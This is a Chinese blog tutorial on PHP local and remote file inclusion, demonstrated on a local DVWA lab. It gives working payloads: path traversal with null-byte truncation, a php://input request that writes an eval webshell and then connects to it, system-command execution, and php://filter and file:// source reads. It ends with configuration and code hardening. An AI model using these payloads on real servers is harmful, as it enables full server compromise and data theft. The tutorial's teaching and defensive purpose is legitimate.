Web安全 文件包含漏洞 (直接拿到 服务器 的最高权限)

已于 2023-11-14 14:19:43 修改
阅读量4.6k 收藏 4
点赞数 28
分类专栏: Web安全 领域. # Web安全 OWASP TOP 10 渗透测试 领域. 文章标签: web安全 网络安全 安全
于 2022-02-12 19:22:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54977781/article/details/122822095
版权

文件包含的漏洞的概括

文件包含的漏洞是  程序员在开发网站的时候,为了方便自己开发构架,使用了一些包含的函数(比如:php开发语言,include() , include_once() , require_once() ... ),而且包含函数中的变量,没有做一些过滤或者限制,使得用户可以 控制传到服务器中的数据,导致文件包含漏洞。

目录:

         文件包含漏洞的执行规则:

         1. 验证其存在本地文件包含漏洞,使页面包含 C 盘里面的 flag.txt 文件.

         2.验证其存在 远程文件包含漏洞.

         3. 利用远程文件包含漏洞,向服务器上写入文件名为 shell.php 的一句话木马,查看创建的文件内容及结果.

         4. 利用 php 输入流,执行系统命令,查看服务器开放的端口,对 url 及页 面回显内容.

         5.用php协议,读取文件源码用法(防止出现乱码)(用base64编码)

         6.file协议的用法(用来访问本地文件系统)

         7. 对漏洞进行加固,对 php 的配置文件进行配置,使其无法 对远程文件进行包含.

         8.对漏洞代码进行加固.

免责声明:

严禁利用本文章中所提到的工具和技术进行非法攻击,否则后果自负,上传者不承担任何责任。

文件包含漏洞的执行规则:

文件包含漏洞可以怎么理解,就是一个 A 文件包含着另一个 B 文件,将包含着 B 文件里面的内容,以这个网站的脚本代码 去执行(如果你的网站是php就是php去执行文件里面的内容,如果你的网站是python,那就是python去执行文件里面的内容

靶场:  

本地自己搭建的DVWA靶场:Win XP(IP地址:192.168.0.105)

DVWA靶场搭建链接:DVWA的靶场搭建_半个西瓜.的博客-CSDN博客

1. 验证其存在本地文件包含漏洞,使页面包含 C 盘里面的 flag.txt 文件.

(1)确定服务器C盘上有 flag.txt 文件.

(2)验证DVWA靶场文件包含是否存在 本地文件包含 漏洞.

../../../../../../flag.txt      (  ../    是上一个目录的意思.)  (  flag.txt    是文件名.)

(3)如果服务器的后台代码有固定的后缀名限制.

就是加%00,/././././././././......再或者是.................(意思就是:使服务器后台的固定文件名失效)

2.验证其存在 远程文件包含漏洞.

这个是说明 allow_url_include 没有开启.(DVWA靶场的准备工作.)

勾起:phpStudy的allow_url_include

 再改文件里的allow_url_includeOn.

(重启phpStudy)就不会出现 allow_url_include 没有开启了.

验证(DVWA靶场)存在远程文件包含漏洞.

(1)phpinfo是 txt文件.

(2)在192.168.0.105(DVWA靶场地址)的www目录下.

(3)利用DVWA靶场的文件包含漏洞  使得phpinfo文件被php代码执行.

命令:?page=http://192.168.0.105:801/phpinfo.txt

3. 利用远程文件包含漏洞,向服务器上写入文件名为 shell.php 的一句话木马,查看创建的文件内容及结果.

(1)写入一句话木马用法:

http://192.168.0.105:801/DVWA/vulnerabilities/fi/?page=php://input

勾选 < Post data >

<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST["bgxg"]); ?>'); ?>

写入一个 shell.php 文件,内容为 <?php @eval($_POST["bgxg"]); ?>

 (2)浏览刚刚写入 shell.php 文件.

http://192.168.0.105:801/DVWA/vulnerabilities/fi/shell.php

(3) 用菜刀连接.

4. 利用 php 输入流,执行系统命令,查看服务器开放的端口,对 url 及页 面回显内容.

(1)执行php代码用法:

http://192.168.0.105:801/DVWA/vulnerabilities/fi/?page=php://input

勾选 < Post data >

<?php system('netstat -ano'); ?>

用php代码执行,执行系统命令  查看服务器开放的端口netstat -ano

5.用php协议,读取文件源码用法(防止出现乱码)(用base64编码

(1)原理:php://filter/read=convert.base64-encode/resource=【文件名】

(2)实际用法:http://192.168.0.105:801/DVWA/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=file2.php

 (3)然后复制base64编码,再用base64编译器解析(在线找 base64 编译器就行).

6.file协议的用法(用来访问本地文件系统

(1)原理:file://【文件的绝对路径和文件名】

🍓(2)实际用法:http://192.168.0.105:801/DVWA/vulnerabilities/fi/?page=file://c:/flag.txt

7. 对漏洞进行加固,对 php 的配置文件进行配置,使其无法 对远程文件进行包含.

(1)先找到php配置文件的位置.

利用远程文件包含的方法(phpinfo.txt文件的代码:<?php phpinfo(); ?>):

http://192.168.0.105:801/DVWA/vulnerabilities/fi/?page=http://192.168.0.105:801/phpinfo.txt

(2)用写入的木马,进行连接服务器.

(1)http://192.168.0.105:801/DVWA/vulnerabilities/fi/shell.php          (木马的位置.)
(2)php配置文件的路径:C:\phpStudy\php\php-5.4.45\php.ini

(3)把 php.ini 文件下载下来,找到 allow_url_include 然后把 On 改为 off

(4)再把 php.ini 文件上传上去,替换掉旧版的php.ini文件(再用远程链接访问,发现访问不了。(成功修复远程文件包含漏洞.)

http://192.168.0.105:801/DVWA/vulnerabilities/fi/?page=http://192.168.0.105:801/phpinfo.txt

8.对漏洞代码进行加固.

(1)没有做任何加固的代码.

<?php
$file = $_GET[ 'page' ];
?> 

(2)过滤掉(http://,https://,../,..\)的加固方式.

<?php
$file = $_GET[ 'page' ];
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );
?>

(3)固定后缀名加固.

<?php
$file = $_GET[ 'page' ];
include($file.".htnl");
?> 

(4)固定文件加固.

<?php
$file = $_GET[ 'page' ];
include('文件名(如:index.php)');
?> 

php伪协议的参考:php伪协议 - 看不尽的尘埃 - 博客园

半个西瓜.
关注
  • 28
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
009-Web安全基础5 - 文件处理漏洞.pptx
10-11
Web应用程序在处理用户上传的文件操作时,如果用户上传文件的路径、文件名、扩展名成为用户可控数据,就会导致直接上传脚本木马到web服务器上,直接控制web服务器。 一些网站由于业务需求,往往需要提供文件查看或文件下载功能,但若对用户查看或下载的文件不做限制,则恶意用户就能够查看或下载任意敏感文件,这就是文件查看与下载漏洞 下载服务器任意文件,如脚本代码、服务及系统配置文件等 可用得到的代码进一步代码审计,得到更多可利用漏洞
第七式 七伤拳 web安全文件包含漏洞专题.pdf
06-22
tsrc线上培训资料 第七式 七伤拳 web安全文件包含漏洞专题
Web应用安全文件包含漏洞简介.pptx
06-18
文件包含漏洞简介 文件包含漏洞简介 1、什么是文件包含漏洞? 开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无需再次编写,这种调用文件的过程一般被称为包含。 为了使代码更加灵活,通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。 将文件包含漏洞分为两类: 本地文件包含 远程文件包含 文件包含漏洞简介 2、包含漏洞的原理解析 大多数Web语言都支持文件包含操作,其中PHP语言所提供的文件包含功能太强大、太灵活,也就导致文件包含漏洞经常出现在PHP语言中。这里就以PHP语言为例。 PHP中提供了四个文件包含的函数: include( ) 当使用该函数包含文件时,只有代码执行到 include()函数时才将文件包含进来,发生错误时只给出一个警告,继续向下执行 include_once( ) 功能与 Include()相同,区别在于当重复调用同一文件时,程序只调用一次 文件包含漏洞简介 2、包含漏洞的原理解析 require( ) require()与 include()的区别在于
渗透测试——提权方式总结
热门推荐
橘子女侠
06-11 3万+
(内容整理自网络) 一、 什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。 Windows:User >> System Linux:User >> Root 二、怎样进行提权(提权的方式有哪些) 1.、系统漏洞提权(Linux、Windows) 2、数据库提权 3、系统配置错误提权 4、权限继承类提权 5、第三方软件...
Web安全 文件上传漏洞的 测试和利用.(上传一个图片或文件 拿下服务器最高权限.)
网络安全领域___专研者.
03-09 5322
文件上传漏洞的 概括: 现在大多的网站和Web应用系统都会有上传功能(比如:文档,图片,头像,视频上传等.),而程序员在开发文件上传功能时,没有对代码做严格校验上传文件的后缀和文件类型. 此时攻击者就可以上传一个与网站脚本语言相对应的恶意代码动态脚本,例如(php,jsp、aspx,asp文件后缀)到服务器上,并将恶意文件传递给网站脚本语言去执行,然后就可以在服务器上执行恶意代码,进行数据库执行、服务器文件管理,服务器命令执行等恶意操作.
Web安全 SQL注入 || 文件上传 的漏洞.(拿到服务器最高权限.)
网络安全领域___专研者.
02-07 5046
本文章是DVWA靶场来模拟,所有答案均为个人想法.(有更好的答案可以评论.) 内容有:(1)SQL注入方式(sqlmap工具的利用)通过SQL注入漏洞一步步拿到管理员后台的账号和密码.(2)寻找网站后台的登陆页面.(3)一句话木马的编写.(4)通过一句话木马连接服务器,并拿到服务器权限.(5)文件上传技巧和绕过一些比较简单的限制.(6)随意下载和上传服务器的文件.(7)远程连接控制服务器.
权限提升:网站漏洞(提权思路.)
网络安全领域___专研者.
04-19 1558
权限提升简称提权,由于操作系统都是多用户操作系统,用户之间都有权限控制,比如通过 Web 漏洞拿到的是 Web 进程的权限,往往 Web 服务都是以一个权限很低的账号启动的,因此通过 Webshell 进行一些操作会受到限制,这就需要将其提升为管理甚至是 System 权限。通常通过操作系统漏洞或操作系统的错误配置进行提权,也可以通过第三方软件服务,如数据库或 FTP 等软件的漏洞进行提权。
php远程包含木马,文件包含漏洞之本地包含和远程包含
weixin_35700003的博客
03-19 478
文件包含漏洞介绍:程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这中文件调用的过程一般被称为文件包含。程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。几乎所有脚本语言都会提供文件包含的功能,但文件包含漏洞在PHP中居多,而在JSP、ASP...
ASP.NET MVC4 权限验证
weixin_33834910的博客
08-21 76
在ASP.NET MVC4 中继承ActionFilterAttribute 类,重写OnActionExecuting方法 /// <summary> /// 权限拦截 /// </summary> [AttributeUsage(AttributeTargets.Class | AttributeTargets.Method, All...
Web安全:文件上传漏洞测试(防止 黑客利用此漏洞.)
网络安全领域___专研者.
05-21 2337
现在大多的网站和Web应用系统都会有上传功能(比如:文档,图片,头像,视频上传等.),而程序员在开发文件上传功能时,没有对代码做严格校验上传文件的后缀和文件类型. 此时攻击者就可以上传一个与网站脚本语言相对应的恶意代码动态脚本,例如(php,jsp、aspx,asp文件后缀)到服务器上,并将恶意文件传递给网站脚本语言去执行,然后就可以在服务器上执行恶意代码,进行数据库执行、服务器文件管理,服务器命令执行等恶意操作.
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
web网站文件包含漏洞和攻击-运维安全详细笔记总结
web网站文件上传漏洞和攻击-运维安全详细笔记
最新发布
06-30
web网站文件上传漏洞和攻击-运维安全详细笔记
web安全技术-实验六、文件上传漏洞.doc
08-20
web安全技术-实验六、文件上传漏洞
Android上传文件到Web服务器 PHP接收文件
08-30
主要为大家详细介绍了Android上传文件到Web服务器,PHP接收文件的相关资料,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
解析web文件操作常见安全漏洞(目录、文件名检测漏洞)
12-18
web开发,我们经常会做代码走查,很多时候,我们都会抽查一些核心功能,或者常会出现漏洞的逻辑。随着技术团队的壮大,组员技术日益成熟。 常见傻瓜型SQL注入漏洞、以及XSS漏洞。会越来越少,但是我们也会发现一些...
一文吃透Linux提权
weixin_45727359的博客
11-07 2406
来自公众号:FreeBuf作者:dnsill0x001 linux提权描述大多数计算机系统设计为可与多个用户一起使用。特权是指允许用户执行的操作。普通特权包括查看和编辑文件或修改系统文件...
堪比“脏牛”!“脏管道” 漏洞可获得Linux 所有主流发行版本的root权限
smellycat000的专栏
03-08 609
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士专栏·供应链安全数字化时代,软件无处不在。软件如同社会中的“虚拟人”,已经成为支撑社会正常运转的最基本元素之一,软件的安全性问题也正在成...
如何快速利用s02-45漏洞获取服务器权限
CODING...
03-13 4873
原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 、作者信息和本声明。否则将追究法律责任。http://simeon.blog.51cto.com/18680/1904351 本文出自 “simeon技术专栏” 博客,请务必保留此出处http://simeon.blog.51cto.com/18680/1905542 1.1CVE-2017-5638漏洞简介
利用redis未授权访问漏洞获取主机权限
Bird&Bird
05-18 1608
目录1、漏洞描述2、漏洞影响版本3、漏洞危害4、漏洞利用 1、漏洞描述 Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证(默认为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在
Web安全漏洞包括文件包含漏洞吗?
05-13
是的,文件包含漏洞Web安全漏洞的一种类型。文件包含漏洞通常发生在Web应用程序中,当应用程序使用用户提供的数据(如文件名或路径)来加载或执行文件时,攻击者可以通过构造恶意输入来实现远程代码执行或敏感信息泄露等攻击。因此,应用程序应该仔细验证和过滤用户提供的数据,并采取适当的防御措施来防止文件包含漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半个西瓜.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值